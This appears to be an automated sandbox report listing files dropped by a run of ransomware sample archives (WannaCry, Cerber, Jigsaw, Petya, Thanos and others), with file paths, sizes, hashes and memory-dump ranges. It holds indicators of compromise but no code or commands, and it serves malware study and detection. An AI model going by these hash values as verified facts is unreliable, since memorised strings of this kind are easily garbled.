SHA51241625fbf4ca8147dd9bfb13b67b325d2522a775a62971556509232d6108946f107a132b3a71de7f822a3018a37c34639fb2fe7fb29c8a2c6da2d45d35caa2c74
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]Filesize
933B
MD5f97d2e6f8d820dbd3b66f21137de4f09
SHA1596799b75b5d60aa9cd45646f68e9c0bd06df252
SHA2560e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a
SHA512efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]Filesize
240KB
MD57bf2b57f2a205768755c07f238fb32cc
SHA145356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA51291a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exeFilesize
3.0MB
MD5fe7eb54691ad6e6af77f8a9a0b6de26d
SHA153912d33bec3375153b7e4e68b78d66dab62671a
SHA256e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA5128ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\b.wnryFilesize
1.4MB
MD5c17170262312f3be7027bc2ca825bf0c
SHA1f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\c.wnryFilesize
780B
MD5383a85eab6ecda319bfddd82416fc6c2
SHA12a9324e1d02c3e41582bf5370043d8afeb02ba6f
SHA256079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21
SHA512c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_bulgarian.wnryFilesize
46KB
MD595673b0f968c0f55b32204361940d184
SHA181e427d15a1a826b93e91c3d2fa65221c8ca9cff
SHA25640b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd
SHA5127601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (simplified).wnryFilesize
53KB
MD50252d45ca21c8e43c9742285c48e91ad
SHA15c14551d2736eef3a1c1970cc492206e531703c1
SHA256845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a
SHA5121bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (traditional).wnryFilesize
77KB
MD52efc3690d67cd073a9406a25005f7cea
SHA152c07f98870eabace6ec370b7eb562751e8067e9
SHA2565c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a
SHA5120766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_croatian.wnryFilesize
38KB
MD517194003fa70ce477326ce2f6deeb270
SHA1e325988f68d327743926ea317abb9882f347fa73
SHA2563f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171
SHA512dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_czech.wnryFilesize
39KB
MD5537efeecdfa94cc421e58fd82a58ba9e
SHA13609456e16bc16ba447979f3aa69221290ec17d0
SHA2565afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150
SHA512e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_danish.wnryFilesize
36KB
MD52c5a3b81d5c4715b7bea01033367fcb5
SHA1b548b45da8463e17199daafd34c23591f94e82cd
SHA256a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6
SHA512490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_dutch.wnryFilesize
36KB
MD57a8d499407c6a647c03c4471a67eaad7
SHA1d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b
SHA2562c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c
SHA512608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_english.wnryFilesize
36KB
MD5fe68c2dc0d2419b38f44d83f2fcf232e
SHA16c6e49949957215aa2f3dfb72207d249adf36283
SHA25626fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5
SHA512941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_filipino.wnryFilesize
36KB
MD508b9e69b57e4c9b966664f8e1c27ab09
SHA12da1025bbbfb3cd308070765fc0893a48e5a85fa
SHA256d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324
SHA512966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnryFilesize
37KB
MD535c2f97eea8819b1caebd23fee732d8f
SHA1e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA2561adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_french.wnryFilesize
37KB
MD54e57113a6bf6b88fdd32782a4a381274
SHA10fccbc91f0f94453d91670c6794f71348711061d
SHA2569bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc
SHA5124f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_german.wnryFilesize
36KB
MD53d59bbb5553fe03a89f817819540f469
SHA126781d4b06ff704800b463d0f1fca3afd923a9fe
SHA2562adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61
SHA51295719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jicjixf2.xr4.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.newFilesize
5.6MB
MD5820a523dff19ae8cb4b7f61fe7f3a9fe
SHA12a7e6eed710c51b41686ebc24244d6915c1babd7
SHA256c091fb84febfac661b0172defee50710e0c122b7f456d989cba45525b7c68f4d
SHA51217f517e6391920a5a84de5bb3bdd86ce86e1a85474426c910b22a8d95344fec5658a6286ce7a88b32019424c33de454b68133a4f2a6dc39dfd6d1ba2ea656718
-
C:\Users\Admin\Downloads\Ransomware.Cerber.zipFilesize
215KB
MD55c571c69dd75c30f95fe280ca6c624e9
SHA1b0610fc5d35478c4b95c450b66d2305155776b56
SHA256416774bf62d9612d11d561d7e13203a3cbc352382a8e382ade3332e3077e096c
SHA5128e7b9a4a514506d9b8e0f50cc521f82b5816d4d9c27da65e4245e925ec74ac8f93f8fe006acbab5fcfd4970573b11d7ea049cc79fb14ad12a3ab6383a1c200b2
-
C:\Users\Admin\Downloads\Ransomware.Jigsaw.zipFilesize
239KB
MD53ad6374a3558149d09d74e6af72344e3
SHA1e7be9f22578027fc0b6ddb94c09b245ee8ce1620
SHA25686a391fe7a237f4f17846c53d71e45820411d1a9a6e0c16f22a11ebc491ff9ff
SHA51221c21b36be200a195bfa648e228c64e52262b06d19d294446b8a544ff1d81f81eb2af74ddbdebc59915168db5dba76d0f0585e83471801d9ee37e59af0620720
-
C:\Users\Admin\Downloads\Ransomware.Petrwrap.zipFilesize
1.1MB
MD56884a35803f2e795fa4b121f636332b4
SHA1527bfbf4436f9cce804152200c4808365e6ba8f9
SHA256cf01329c0463865422caa595de325e5fe3f7fba44aabebaae11a6adfeb78b91c
SHA512262732a9203e2f3593d45a9b26a1a03cc185a20cf28fad3505e257b960664983d2e4f2b19b9ff743015310bf593810bd049eb03d0fd8912a6d54de739742de60
-
C:\Users\Admin\Downloads\Ransomware.Petya.zipFilesize
538KB
MD5e8fb95ebb7e0db4c68a32947a74b5ff9
SHA16f93f85342aa3ea7dcbe69cfb55d48e5027b296c
SHA25633ca487a65d38bad82dccfa0d076bad071466e4183562d0b1ad1a2e954667fe9
SHA512a2dea77b0283f4ed987c4de8860a9822bfd030be9c3096cda54f6159a89d461099e58efbc767bb8c04ae21ddd4289da578f8d938d78f30d40f9bca6567087320
-
C:\Users\Admin\Downloads\Ransomware.Thanos.zipFilesize
145KB
MD500184463f3b071369d60353c692be6f0
SHA1d3c1e90f39da2997ef4888b54d706b1a1fde642a
SHA256cd0f55dd00111251cd580c7e7cc1d17448faf27e4ef39818d75ce330628c7787
SHA512baa931a23ecbcb15dda6a1dc46d65fd74b46ccea8891c48f0822a8a10092b7d4f7ea1dc971946a161ac861f0aa8b99362d5bea960b47b10f8c91e33d1b018006
-
C:\Users\Admin\Downloads\Ransomware.Thanos.zip:Zone.IdentifierFilesize
55B
MD50f98a5550abe0fb880568b1480c96a1c
SHA1d2ce9f7057b201d31f79f3aee2225d89f36be07d
SHA2562dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1
SHA512dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6
-
C:\Users\Admin\Downloads\Ransomware.Vipasana.zipFilesize
638KB
MD58d2c4c192772985776bacfd77f7bc4d9
SHA13b923b911d443e321e551f26c9588b16a994d52e
SHA2561733b199a7063443c167e3caeae7dda2315f590341ea2152a9b132e1ad8e94a8
SHA5126c24f2fe498cf38e3f3d66b62915e6fbc8c2746a1d4c3c3de270f994b02e1369b9540099c12d150712574ececbe63c8c9f28877d8aa4557fbbb7890d5a0de6c1
-
C:\Users\Admin\Downloads\Ransomware.WannaCry.zipFilesize
3.3MB
MD5efe76bf09daba2c594d2bc173d9b5cf0
SHA1ba5de52939cb809eae10fdbb7fac47095a9599a7
SHA256707a9f323556179571bc832e34fa592066b1d5f2cac4a7426fe163597e3e618a
SHA5124a1df71925cf2eb49c38f07c6a95bea17752b025f0114c6fd81bc0841c1d1f2965b5dda1469e454b9e8207c2e0dfd3df0959e57166620ccff86eeeb5cf855029
-
C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.IdentifierFilesize
26B
MD5fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98
-
C:\Users\Admin\Downloads\Ransomware.WannaCry_Plus.zipFilesize
2.3MB
MD55641d280a62b66943bf2d05a72a972c7
SHA1c857f1162c316a25eeff6116e249a97b59538585
SHA256ab14c3f5741c06ad40632447b2fc10662d151afb32066a507aab4ec866ffd488
SHA5120633bc32fa6d31b4c6f04171002ad5da6bb83571b9766e5c8d81002037b4bc96e86eb059d35cf5ce17a1a75767461ba5ac0a89267c3d0e5ce165719ca2af1752
-
\??\pipe\LOCAL\crashpad_2800_IANURAIYPWGKAIDPMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/2924-622-0x00000000062E0000-0x000000000632C000-memory.dmpFilesize
304KB
-
memory/2924-620-0x0000000005DF0000-0x0000000006147000-memory.dmpFilesize
3.3MB
-
memory/2924-609-0x0000000005510000-0x0000000005532000-memory.dmpFilesize
136KB
-
memory/2924-607-0x0000000002A80000-0x0000000002AB6000-memory.dmpFilesize
216KB
-
memory/2924-608-0x00000000056E0000-0x0000000005D0A000-memory.dmpFilesize
6.2MB
-
memory/2924-611-0x0000000005D80000-0x0000000005DE6000-memory.dmpFilesize
408KB
-
memory/2924-633-0x00000000067C0000-0x00000000067DA000-memory.dmpFilesize
104KB
-
memory/2924-632-0x0000000007B00000-0x000000000817A000-memory.dmpFilesize
6.5MB
-
memory/2924-610-0x0000000005D10000-0x0000000005D76000-memory.dmpFilesize
408KB
-
memory/2924-621-0x00000000062A0000-0x00000000062BE000-memory.dmpFilesize
120KB
-
memory/3124-640-0x000000001E2F0000-0x000000001E342000-memory.dmpFilesize
328KB
-
memory/3124-636-0x000000001D5D0000-0x000000001DA9E000-memory.dmpFilesize
4.8MB
-
memory/3124-637-0x000000001DB40000-0x000000001DBDC000-memory.dmpFilesize
624KB
-
memory/3124-638-0x000000001DC50000-0x000000001DCB2000-memory.dmpFilesize
392KB
-
memory/3124-639-0x000000001BF70000-0x000000001BF78000-memory.dmpFilesize
32KB
-
memory/3492-2216-0x0000000071380000-0x0000000071402000-memory.dmpFilesize
520KB
-
memory/3492-2255-0x0000000000090000-0x000000000038E000-memory.dmpFilesize
3.0MB
-
memory/3492-2217-0x0000000071130000-0x0000000071152000-memory.dmpFilesize
136KB
-
memory/3492-2218-0x0000000000090000-0x000000000038E000-memory.dmpFilesize
3.0MB
-
memory/3492-2215-0x0000000071160000-0x000000007137C000-memory.dmpFilesize
2.1MB
-
memory/3492-2256-0x0000000071410000-0x0000000071492000-memory.dmpFilesize
520KB
-
memory/3492-2261-0x00000000710B0000-0x0000000071127000-memory.dmpFilesize
476KB
-
memory/3492-2260-0x00000000714A0000-0x00000000714BC000-memory.dmpFilesize
112KB
-
memory/3492-2259-0x0000000071380000-0x0000000071402000-memory.dmpFilesize
520KB
-
memory/3492-2258-0x0000000071160000-0x000000007137C000-memory.dmpFilesize
2.1MB
-
memory/3492-2257-0x0000000071130000-0x0000000071152000-memory.dmpFilesize
136KB
-
memory/3492-2214-0x0000000071410000-0x0000000071492000-memory.dmpFilesize
520KB
-
memory/3492-2265-0x0000000000090000-0x000000000038E000-memory.dmpFilesize
3.0MB
-
memory/3492-2272-0x0000000000090000-0x000000000038E000-memory.dmpFilesize
3.0MB
-
memory/3492-2294-0x0000000071160000-0x000000007137C000-memory.dmpFilesize
2.1MB
-
memory/3492-2291-0x0000000000090000-0x000000000038E000-memory.dmpFilesize
3.0MB
-
memory/3492-2329-0x0000000000090000-0x000000000038E000-memory.dmpFilesize
3.0MB
-
memory/3492-2338-0x0000000000090000-0x000000000038E000-memory.dmpFilesize
3.0MB
-
memory/3492-2341-0x0000000071160000-0x000000007137C000-memory.dmpFilesize
2.1MB
-
memory/3492-2349-0x0000000071160000-0x000000007137C000-memory.dmpFilesize
2.1MB
-
memory/3492-2346-0x0000000000090000-0x000000000038E000-memory.dmpFilesize
3.0MB
-
memory/3492-2354-0x0000000000090000-0x000000000038E000-memory.dmpFilesize
3.0MB
-
memory/3492-2357-0x0000000071160000-0x000000007137C000-memory.dmpFilesize
2.1MB
-
memory/4616-786-0x0000000010000000-0x0000000010010000-memory.dmpFilesize
64KB